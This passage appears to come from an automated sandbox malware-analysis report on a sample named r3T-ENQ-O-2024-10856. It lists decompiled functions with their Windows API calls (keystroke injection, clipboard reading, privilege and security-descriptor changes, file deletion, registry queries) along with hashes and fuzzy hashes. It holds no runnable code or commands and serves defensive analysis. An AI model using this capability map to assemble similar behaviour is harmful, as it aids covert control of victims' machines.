                            • SendMessageW.USER32 ref: 000EFD0D
                            • ClientToScreen.USER32(?,?), ref: 000EFD57
                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 000EFD87
                            • GetWindowLongW.USER32(?,000000F0), ref: 000EFE1C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                            • String ID: @GUI_DRAGID$F
                            • API String ID: 2516578528-4164748364
                            • Opcode ID: 53139993f30abed1a6e52f48c61ff011ea93188ab209630a572a9c15ee657cc4
                            • Instruction ID: f72ec201661f5f8fb76ec16c2ff93b1f3603ee7f4a061399c39b4203cc30d998
                            • Opcode Fuzzy Hash: 53139993f30abed1a6e52f48c61ff011ea93188ab209630a572a9c15ee657cc4
                            • Instruction Fuzzy Hash: FB32D074204282AFD760DF65C884EBABBE5FF48358F140629F6A9A72B1D771DC80CB51
                            Function 000EA8DC Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 000EAFDB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID: %d/%02d/%02d
                            • API String ID: 3850602802-328681919
                            • Opcode ID: ac728769c25f1f307f3fcd2882cf11dd292cb470b361c2148cd86aa354b796df
                            • Instruction ID: dfbf876e8d50c4b85841ebf53ee5bd9247ddc9bd3289d182207044ba1bf3b865
                            • Opcode Fuzzy Hash: ac728769c25f1f307f3fcd2882cf11dd292cb470b361c2148cd86aa354b796df
                            • Instruction Fuzzy Hash: 7C12D571600244AFEB258FA6DC49FAE7BF8EF4A310F104129F555EB1E1DBB0A941CB12
                            Function 0009F78E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                            Download Yara Rule
                            APIs
                            • GetForegroundWindow.USER32(00000000,00000000), ref: 0009F796
                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 000F4388
                            • IsIconic.USER32(000000FF), ref: 000F4391
                            • ShowWindow.USER32(000000FF,00000009), ref: 000F439E
                            • SetForegroundWindow.USER32(000000FF), ref: 000F43A8
                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 000F43BE
                            • GetCurrentThreadId.KERNEL32 ref: 000F43C5
                            • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 000F43D1
                            • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 000F43E2
                            • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 000F43EA
                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 000F43F2
                            • SetForegroundWindow.USER32(000000FF), ref: 000F43F5
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 000F440A
                            • keybd_event.USER32(00000012,00000000), ref: 000F4415
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 000F441F
                            • keybd_event.USER32(00000012,00000000), ref: 000F4424
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 000F442D
                            • keybd_event.USER32(00000012,00000000), ref: 000F4432
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 000F443C
                            • keybd_event.USER32(00000012,00000000), ref: 000F4441
                            • SetForegroundWindow.USER32(000000FF), ref: 000F4444
                            • AttachThreadInput.USER32(000000FF,?,00000000), ref: 000F446B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                            • String ID: Shell_TrayWnd
                            • API String ID: 4125248594-2988720461
                            • Opcode ID: 5cde471e9b22aa03c715a0a80909c122fbeb3e59ab82455e359d1596f5ffe62f
                            • Instruction ID: ef2a34d7f51c59b717010449a022c6f1515df592ec9b4069e5f796a4253db2bf
                            • Opcode Fuzzy Hash: 5cde471e9b22aa03c715a0a80909c122fbeb3e59ab82455e359d1596f5ffe62f
                            • Instruction Fuzzy Hash: BE317071A4021CBBEB206BB1AC4AF7F7E6CEB44B50F114025FF44AA5D0C6F19940AEA0
                            Function 000BB9F1 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 223COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000BBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000BBF0F
                              • Part of subcall function 000BBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000BBF3C
                              • Part of subcall function 000BBEC3: GetLastError.KERNEL32 ref: 000BBF49
                            • _memset.LIBCMT ref: 000BBA34
                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 000BBA86
                            • CloseHandle.KERNEL32(?), ref: 000BBA97
                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 000BBAAE
                            • GetProcessWindowStation.USER32 ref: 000BBAC7
                            • SetProcessWindowStation.USER32(00000000), ref: 000BBAD1
                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 000BBAEB
                              • Part of subcall function 000BB8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,000BB9EC), ref: 000BB8C5
                              • Part of subcall function 000BB8B0: CloseHandle.KERNEL32(?,?,000BB9EC), ref: 000BB8D7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                            • String ID: $default$winsta0
                            • API String ID: 2063423040-1027155976
                            • Opcode ID: 9e027768e9d77245f28d64a408fec7b963b5e4bd49b4da14c26748df8951ccd0
                            • Instruction ID: fd5bcd5934b78af7adf59d94a8d200028eeb2af9e910962eecb6877aa1d2a1ba
                            • Opcode Fuzzy Hash: 9e027768e9d77245f28d64a408fec7b963b5e4bd49b4da14c26748df8951ccd0
                            • Instruction Fuzzy Hash: 728168B1800209AFDF11DFE4DD89AEEBBB8FF08304F144529F955A6161DBB18E55EB20
                            Function 000C6B3F Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 164filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000831B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 000831DA
                              • Part of subcall function 000C7B9F: __wsplitpath.LIBCMT ref: 000C7BBC
                              • Part of subcall function 000C7B9F: __wsplitpath.LIBCMT ref: 000C7BCF
                              • Part of subcall function 000C7C0C: GetFileAttributesW.KERNEL32(?,000C6A7B), ref: 000C7C0D
                            • _wcscat.LIBCMT ref: 000C6B9D
                            • _wcscat.LIBCMT ref: 000C6BBB
                            • __wsplitpath.LIBCMT ref: 000C6BE2
                            • FindFirstFileW.KERNEL32(?,?), ref: 000C6BF8
                            • _wcscpy.LIBCMT ref: 000C6C57
                            • _wcscat.LIBCMT ref: 000C6C6A
                            • _wcscat.LIBCMT ref: 000C6C7D
                            • lstrcmpiW.KERNEL32(?,?), ref: 000C6CAB
                            • DeleteFileW.KERNEL32(?), ref: 000C6CBC
                            • MoveFileW.KERNEL32(?,?), ref: 000C6CDB
                            • MoveFileW.KERNEL32(?,?), ref: 000C6CEA
                            • CopyFileW.KERNEL32(?,?,00000000), ref: 000C6CFF
                            • DeleteFileW.KERNEL32(?), ref: 000C6D10
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 000C6D37
                            • FindClose.KERNEL32(00000000), ref: 000C6D53
                            • FindClose.KERNEL32(00000000), ref: 000C6D61
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                            • String ID: \*.*
                            • API String ID: 1867810238-1173974218
                            • Opcode ID: 14ce94a20e9ac8690972bd6f0cca55323b2ec6fce6a9a9ec9c5d85a71a25a42d
                            • Instruction ID: 4e796e2b6956f4bc8ef3b3868e231d4283e14a929b201aa6636ce7a1bb522854
                            • Opcode Fuzzy Hash: 14ce94a20e9ac8690972bd6f0cca55323b2ec6fce6a9a9ec9c5d85a71a25a42d
                            • Instruction Fuzzy Hash: 2C51107290415CAADB21EBE0DC84FEE77BCAF05300F4445DAE54AA3042DB719B89CF61
                            Function 000D7099 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                            Download Yara Rule
                            APIs
                            • OpenClipboard.USER32(0011DBF0), ref: 000D70C3
                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 000D70D1
                            • GetClipboardData.USER32(0000000D), ref: 000D70D9
                            • CloseClipboard.USER32 ref: 000D70E5
                            • GlobalLock.KERNEL32(00000000), ref: 000D7101
                            • CloseClipboard.USER32 ref: 000D710B
                            • GlobalUnlock.KERNEL32(00000000), ref: 000D7120
                            • IsClipboardFormatAvailable.USER32(00000001), ref: 000D712D
                            • GetClipboardData.USER32(00000001), ref: 000D7135
                            • GlobalLock.KERNEL32(00000000), ref: 000D7142
                            • GlobalUnlock.KERNEL32(00000000), ref: 000D7176
                            • CloseClipboard.USER32 ref: 000D7283
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                            • String ID:
                            • API String ID: 3222323430-0
                            • Opcode ID: 81684cb320cbd683bd2cb8e8e88582e7fafbe5f0ef3914cd3a3150bc2336642e
                            • Instruction ID: e33548aba31df4ead8a235db579e6a5f693273fb982c82df6873f5c8938a04a6
                            • Opcode Fuzzy Hash: 81684cb320cbd683bd2cb8e8e88582e7fafbe5f0ef3914cd3a3150bc2336642e
                            • Instruction Fuzzy Hash: 3151A635208305AFD310FBA4DC46FBE77A8BB44B11F00052AF58AD62D2EBB1D9458B72
                            Function 000D2044 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                            Download Yara Rule
                            APIs
                            • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 000D2065
                            • _wcscmp.LIBCMT ref: 000D207A
                            • _wcscmp.LIBCMT ref: 000D2091
                            • GetFileAttributesW.KERNEL32(?), ref: 000D20A3
                            • SetFileAttributesW.KERNEL32(?,?), ref: 000D20BD
                            • FindNextFileW.KERNEL32(00000000,?), ref: 000D20D5
                            • FindClose.KERNEL32(00000000), ref: 000D20E0
                            • FindFirstFileW.KERNEL32(*.*,?), ref: 000D20FC
                            • _wcscmp.LIBCMT ref: 000D2123
                            • _wcscmp.LIBCMT ref: 000D213A
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 000D214C
                            • SetCurrentDirectoryW.KERNEL32(00133A68), ref: 000D216A
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 000D2174
                            • FindClose.KERNEL32(00000000), ref: 000D2181
                            • FindClose.KERNEL32(00000000), ref: 000D2191
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                            • String ID: *.*
                            • API String ID: 1803514871-438819550
                            • Opcode ID: 5cac4c50c14366d9bc391442fa6acffa645624ed900633f165673809bcd1e8c8
                            • Instruction ID: f858858299c5a7c015edbbe337c7173cfe714a2e79b68c5b219da6cb0ec5eb26
                            • Opcode Fuzzy Hash: 5cac4c50c14366d9bc391442fa6acffa645624ed900633f165673809bcd1e8c8
                            • Instruction Fuzzy Hash: 6131A0355003197ACB24EBE4EC48ADE77ECAF65361F104166E950E3291DBB0DE84CB74
                            Function 000D219F Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                            Download Yara Rule
                            APIs
                            • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 000D21C0
                            • _wcscmp.LIBCMT ref: 000D21D5
                            • _wcscmp.LIBCMT ref: 000D21EC
                              • Part of subcall function 000C7606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 000C7621
                            • FindNextFileW.KERNEL32(00000000,?), ref: 000D221B
                            • FindClose.KERNEL32(00000000), ref: 000D2226
                            • FindFirstFileW.KERNEL32(*.*,?), ref: 000D2242
                            • _wcscmp.LIBCMT ref: 000D2269
                            • _wcscmp.LIBCMT ref: 000D2280
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 000D2292
                            • SetCurrentDirectoryW.KERNEL32(00133A68), ref: 000D22B0
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 000D22BA
                            • FindClose.KERNEL32(00000000), ref: 000D22C7
                            • FindClose.KERNEL32(00000000), ref: 000D22D7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                            • String ID: *.*
                            • API String ID: 1824444939-438819550
                            • Opcode ID: 6650b9dbf9f22b24e3727e0563d6e063f117e6bc3223489b5613d5cd0a98ed3d
                            • Instruction ID: 8661ffe6d02db3251219d9f5ab4a6d0a697d2de7a2c7721f61fe4c4e7a6f7c07
                            • Opcode Fuzzy Hash: 6650b9dbf9f22b24e3727e0563d6e063f117e6bc3223489b5613d5cd0a98ed3d
                            • Instruction Fuzzy Hash: EA31A1319053197ACB24EBA4EC48EEE77ACAF65320F1041A6F850A3291DB709F85DB74
                            Function 00086BBC Relevance: 21.9, APIs: 5, Strings: 7, Instructions: 891COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _memmove_memset
                            • String ID: Q\E$[$\$\$\$]$^
                            • API String ID: 3555123492-286096704
                            • Opcode ID: 20fd6b4a1c4a510f6ab918bbe19e8baf5d678d8dd1d072fc7675b2fddc0e6f63
                            • Instruction ID: f384c4627b2d43bb2494f8b49e55341cfb8875547d04dde9a736fd27d399f891
                            • Opcode Fuzzy Hash: 20fd6b4a1c4a510f6ab918bbe19e8baf5d678d8dd1d072fc7675b2fddc0e6f63
                            • Instruction Fuzzy Hash: 8B72BD71D00219DBDF29DF98C8807ADB7B1FF48314F2581A9D899AB381E775AE80DB50
                            Function 000BB398 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000BB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 000BB903
                              • Part of subcall function 000BB8E7: GetLastError.KERNEL32(?,000BB3CB,?,?,?), ref: 000BB90D
                              • Part of subcall function 000BB8E7: GetProcessHeap.KERNEL32(00000008,?,?,000BB3CB,?,?,?), ref: 000BB91C
                              • Part of subcall function 000BB8E7: HeapAlloc.KERNEL32(00000000,?,000BB3CB,?,?,?), ref: 000BB923
                              • Part of subcall function 000BB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 000BB93A
                              • Part of subcall function 000BB982: GetProcessHeap.KERNEL32(00000008,000BB3E1,00000000,00000000,?,000BB3E1,?), ref: 000BB98E
                              • Part of subcall function 000BB982: HeapAlloc.KERNEL32(00000000,?,000BB3E1,?), ref: 000BB995
                              • Part of subcall function 000BB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,000BB3E1,?), ref: 000BB9A6
                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 000BB3FC
                            • _memset.LIBCMT ref: 000BB411
                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 000BB430
                            • GetLengthSid.ADVAPI32(?), ref: 000BB441
                            • GetAce.ADVAPI32(?,00000000,?), ref: 000BB47E
                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 000BB49A
                            • GetLengthSid.ADVAPI32(?), ref: 000BB4B7
                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 000BB4C6
                            • HeapAlloc.KERNEL32(00000000), ref: 000BB4CD
                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 000BB4EE
                            • CopySid.ADVAPI32(00000000), ref: 000BB4F5
                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 000BB526
                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 000BB54C
                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 000BB560
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                            • String ID:
                            • API String ID: 3996160137-0
                            • Opcode ID: fbc40e09831a41e723fa1c7590b5088fa32831fd2f0f01a1c2a551ad018e0a7f
                            • Instruction ID: 59b0327c8dc1944ae6f1a305e33cfa0c1e22510ea83e51f1cfe6ea4c422a3e11
                            • Opcode Fuzzy Hash: fbc40e09831a41e723fa1c7590b5088fa32831fd2f0f01a1c2a551ad018e0a7f
                            • Instruction Fuzzy Hash: 28511871900209AFDF10DFA5DC45AEEBBB9FF04300F148129F956AB2A1DBB5DA45CB60
                            Function 000C6E4A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 85fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000831B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 000831DA
                              • Part of subcall function 000C7C0C: GetFileAttributesW.KERNEL32(?,000C6A7B), ref: 000C7C0D
                            • _wcscat.LIBCMT ref: 000C6E7E
                            • __wsplitpath.LIBCMT ref: 000C6E99
                            • FindFirstFileW.KERNEL32(?,?), ref: 000C6EAE
                            • _wcscpy.LIBCMT ref: 000C6EDD
                            • _wcscat.LIBCMT ref: 000C6EEF
                            • _wcscat.LIBCMT ref: 000C6F01
                            • DeleteFileW.KERNEL32(?), ref: 000C6F0E
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 000C6F22
                            • FindClose.KERNEL32(00000000), ref: 000C6F3D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                            • String ID: \*.*
                            • API String ID: 2643075503-1173974218
                            • Opcode ID: 0a04c583408e9bd99f25bb608ad59d232426683e5a8d3af4b2b52620eae10b15
                            • Instruction ID: c81d9255005b45820b563a838d92ddd365e32bdbd5a36d72b63d1a98e056763c
                            • Opcode Fuzzy Hash: 0a04c583408e9bd99f25bb608ad59d232426683e5a8d3af4b2b52620eae10b15
                            • Instruction Fuzzy Hash: 0421C1B2408344AAC620EBE4D884EDFBBDCAF59214F044A6EF5D4C3152EB31D64DC7A2
                            Function 00085D32 Relevance: 17.1, Strings: 13, Instructions: 810COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID:
                            • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_START_OPT)$UCP)$UTF)$UTF16)
                            • API String ID: 0-2893523900
                            • Opcode ID: 713ca9315ff127fa95193d7427592e98204ca82752d6ba966b593627b1fcc96e
                            • Instruction ID: 9cd9739150a52ca54994199c5b5fa3aafd65dd51a077a71c30808cbf6a0eff37
                            • Opcode Fuzzy Hash: 713ca9315ff127fa95193d7427592e98204ca82752d6ba966b593627b1fcc96e
                            • Instruction Fuzzy Hash: F16293B1E00219DBDF24DF99C8817AEB7B5BF48310F15816AE895EB2C1DB719E41CB90
                            Function 000E30AD Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000E3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000E2AA6,?,?), ref: 000E3B0E
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000E317F
                              • Part of subcall function 000884A6: __swprintf.LIBCMT ref: 000884E5
                              • Part of subcall function 000884A6: __itow.LIBCMT ref: 00088519
                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 000E321E
                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 000E32B6
                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 000E34F5
                            • RegCloseKey.ADVAPI32(00000000), ref: 000E3502
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
